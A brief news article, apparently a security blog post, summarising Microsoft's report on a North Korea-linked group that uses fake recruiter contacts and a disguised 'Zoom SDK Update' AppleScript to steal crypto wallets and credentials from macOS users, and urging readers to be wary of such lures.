North Korea targets macOS users in latest heist

April 16, 2026
aisecurityprivacymobile
Close-up view of Bitcoin and Ethereum coins next to a laptop and pen on a black surface.
Photo by Leeloo The First on Pexels

The setup

Microsoft says it is tracking a Pyongyang-linked crew known as Sapphire Sleet (aka APT38) that focuses on stealing crypto and finance-sector secrets. The group is allegedly backed by North Korea, and it has been reported that its latest wave uses fake recruiter profiles and phony technical interviews on platforms like LinkedIn to shepherd victims into staged support calls. Why write clever exploits when you can con a human? Social engineering is cheap, scalable—and brutally effective.

The lure

It has been reported that victims are invited to a fake Zoom support meeting and asked to download a file named Zoom SDK Update.scpt. The file is a compiled AppleScript that opens in macOS Script Editor and is padded with a large comment block and thousands of blank lines to hide malicious logic below the fold. The script even invokes the legitimate macOS softwareupdate binary with an invalid parameter to make the action look authentic before using curl to fetch and execute a chain of attacker-controlled AppleScripts.

What the attackers take

From that single staged interaction, the attack unfolds in multiple stages. Microsoft says the chain fetches payloads that orchestrate a backdoor, register the machine with command-and-control servers, bypass macOS privacy controls, and harvest credentials and sensitive data—wallets, browser history, keychains, Apple Notes and Telegram logins. It has been reported that each stage uses distinct user‑agent strings to track campaign progress and tailor payloads.

Why it matters

“Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf,” Sherrod DeGrippo, Microsoft’s global threat intelligence GM, told The Register. The emotional punch is simple: someone trusted asks you to click, and you do. This campaign is a reminder that the industry’s shift toward supply-chain and people-focused attacks—remember the Axios maintainer incident—means defenses must include training and skepticism, not just better signatures. How wary are you, really, when a recruiter wants to Zoom?

Sources: The Register